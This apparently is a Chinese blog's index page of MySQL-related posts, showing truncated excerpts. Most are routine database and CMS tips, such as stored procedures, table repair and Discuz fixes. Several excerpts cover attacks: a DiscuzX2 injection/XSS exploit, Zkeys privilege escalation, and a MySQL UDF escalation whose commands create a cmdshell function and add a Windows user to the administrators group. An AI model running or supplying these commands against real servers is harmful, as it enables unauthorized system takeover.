MySQL
沧海一波
这个作者很懒,什么都没留下…
展开
-
DiscuzX2注入漏洞及XSS漏洞的利用
注射漏洞详细说明:文件:source\module\forum\forum_attachment.phpif(!defined('IN_DISCUZ')) {exit('Access Denied');}define('NOROBOT', TRUE);@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'],转载 2011-11-17 11:20:59 · 4990 阅读 · 0 评论 -
Zkeys提权一则
ZKEYS 是一个国内比较常用的IDC虚拟主机系统原名:AutoHost后改名:ZKEYS 虚拟管理系统支持.NET 的话 查找注册表HKEY_LOCAL_MACHINESOFTWAREZKEYS默认会有 ZKEYS 路径找到路径后如果找不到 可以猜 一般都在根目录ZKEYS 管理系统对 目录的限制 一般都不怎么严谨所以这个时候你懂得。。。一般都在硬盘的根目转载 2013-01-24 17:00:21 · 1708 阅读 · 0 评论 -
mysql存储过程动态参数查询
1、动态sql, 即动态参数: 在存储过程中,想要直接用表名变量做参数,动态执行sql,不能直接写?1234567createprocedure ( $tableName char(20) ) BEGIN select* from tableName; END转载 2012-09-04 17:26:20 · 1158 阅读 · 0 评论 -
MySql的存储过程学习小结
1.用变量做表名:简单的用set或者declare语句定义变量,然后直接作为sql的表名是不行的,mysql会把变量名当作表名。在其他的sql数据库中也是如此,mssql的解决方法是将整条sql语句作为变量,其中穿插变量作为表名,然后用sp_executesql调用该语句。这在mysql5.0之前是不行的,5.0之后引入了一个全新的语句,可以达到类似sp_executesql的功能转载 2012-08-30 09:22:06 · 612 阅读 · 0 评论 -
mysql存储过程写法—动态参数运用
--删除 drop procedure if exists up_common_select --创建 CREATE PROCEDURE `up_common_select` ( in t_name varchar(50) )转载 2012-08-30 09:13:12 · 627 阅读 · 0 评论 -
Zencart: Data too long...(Zencar目录名/文件名太长)的解决方法
执行以下SQL语句即可,这方便了想做长尾关键词SEO的朋友:ALTER TABLE zcz_products MODIFY products_model varchar(256) ;ALTER TABLE zcz_products_description MODIFY products_name varchar(256) ;ALTER TABLE zcz_address_book转载 2012-05-24 14:35:28 · 785 阅读 · 0 评论 -
修复DISCUZ!的pre_connect_feedlog等表不存在错误
执行如下语句即可: DROP TABLE IF EXISTS pre_connect_feedlog; CREATE TABLE pre_connect_feedlog ( flid mediumint(8) unsigned NOT NULL AUTO_INCREMENT, tid mediumint(8) unsigned NOT NULL DEFAULT '0', u原创 2012-03-10 09:17:43 · 654 阅读 · 0 评论 -
mysql 中的浮点和定点类型 .
前面一段实验是引用别人的,后面作了一点补充MySQL浮点型和定点型可以用类型名称后加(M,D)来表示,M表示该值的总共长度,D表示小数点后面的长度,M和D又称为精度和标度,如 float(7,4)的可显示为-999.9999,MySQL保存值时进行四舍五入,如果插入999.00009,则结果为999.0001。 FLOAT和DOUBLE在不指定精度时,默认会按照实际的精度来显示,而DECIMA转载 2012-03-21 17:23:21 · 664 阅读 · 0 评论 -
脚本安全的本质 PHP篇
一 前言 问题的存在 从代码级别上,也就是应用层次上考虑代码安全的话(也就是不考虑底层的语言本身等问题的漏洞),脚本安全问题就是函数和变量的问题。变量直接或者间接的接收用户不安全的的输入,由于php本身的特性,在php中更容易发现这种变量的混乱(很多php程序都用来定义以及初始化以及接收变量,可以直接在程序中使用$id这样的变量,初始化完全由php的设置来完成,如果稍不注意,就可转载 2012-03-20 09:46:01 · 1188 阅读 · 0 评论 -
解除Discuz!X2的15分钟锁定
第一种方法:清两个failedlogin空表解除用户锁定:mysql> delete from pre_common_failedlogin;Query OK, 1 row affected (0.02 sec)解除UC用户锁定:mysql> delete from pre_ucenter_failedlogins;Query OK, 1 row affected原创 2012-03-07 14:49:24 · 2398 阅读 · 0 评论 -
MySQL命令修改密码与授权
一、通过MySQL命令行,可以修改MySQL数据库的密码,下面就为您详细介绍该MySQL命令行,如果您感兴趣的话,不妨一看。格式:mysqladmin -u用户名 -p旧密码 password 新密码1、给root加个密码ab12。首先在DOS下进入目录mysql\bin,然后键入以下命令 mysqladmin -u root -password ab12 注:因为开始转载 2012-01-06 10:21:31 · 672 阅读 · 0 评论 -
MySQL中的CHECK TABLE语句和REPAIR TABLE语句
1>.CHECK TABLE语法CHECK TABLE tbl_name[,tbl_name] ... [option] ...option= {QUICK | FAST | MEDIUM | EXTENDED | CHANGED} 检查一个或多个表是否有错误。CHECK TABLE对MyISAM和InnoDB表有作用。对于MyISAM表,关键字统计数据被更新。 CHECK TAB转载 2012-02-01 10:49:03 · 6414 阅读 · 0 评论 -
Mysql表崩溃后的修复
有时候我们的Mysql数据表会出现crash的情况:Table was marked as crashed and should be repaired这时候我们就需要对表进行相关的检查,及修复。检查一个或多个表是否有错误。CHECK TABLE对MyISAM和InnoDB表有作用。 用法:CHECK TABLE tbl_name [, tbl_name2] 示例如下:CH转载 2012-02-01 10:44:38 · 2434 阅读 · 0 评论 -
Zencart banner开发之轻松打造焦点图
随便整个能用的焦点图JS+CSS后,利用zencart自带的数据库框架循环调用banner组中的图片。我这里调用的是标题位置3这个位置的,几句代码轻松搞定。我把它写在\includes\languages\english\html_includes\xisky\define_main_page中,当然你也可以把它写在其它的页面中。 if (SHOW_BANNERS原创 2011-12-16 09:20:50 · 1296 阅读 · 0 评论 -
一段简洁的PHP安装文件代码
require_once( dirname(__FILE__) . '/include/application.php');header('Content-Type: text/html; charset=UTF-8;'); Session::Init();$writeable['c'] = is_writable(dirname(__FILE__) . '/include/confi原创 2011-11-05 17:39:59 · 888 阅读 · 0 评论 -
SELECT INTO 和 INSERT INTO SELECT 两种表复制语句
Insert是T-sql中常用语句,Insert INTO table(field1,field2,...) values(value1,value2,...)这种形式的在应用程序开发中必不可少。但我们在开发、测试过程中,经常会遇到需要表复制的情况,如将一个table1的数据的部分字段复制到table2中,或者将整个table1复制到table2中,这时候我们就要使用SELECT INTO 和转载 2011-11-23 11:10:03 · 284 阅读 · 0 评论 -
两段mysql查询解决从DISCUZ X2到PHPWIND8.7的文章迁移
先看看DiscuzX2的文章表,主要涉及到两个:dzz_portal_article_title和dzz_portal_article_content再看看PHPWind8的表,也是两个:pw_cms_article和pw_cms_articlecontent其中DiscuzX2的表字段如下:表dzz_portal_article_title-->aidca原创 2011-11-23 11:04:33 · 979 阅读 · 0 评论 -
MySQL服务器提权两例
一 UDF提权这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:create function cmdshell returns string soname ’udf.dll’select cmdshell(’net user iis_user 123!@#abcABC /add’);select cmdshell(’net localgroup administ转载 2013-01-31 14:55:20 · 580 阅读 · 0 评论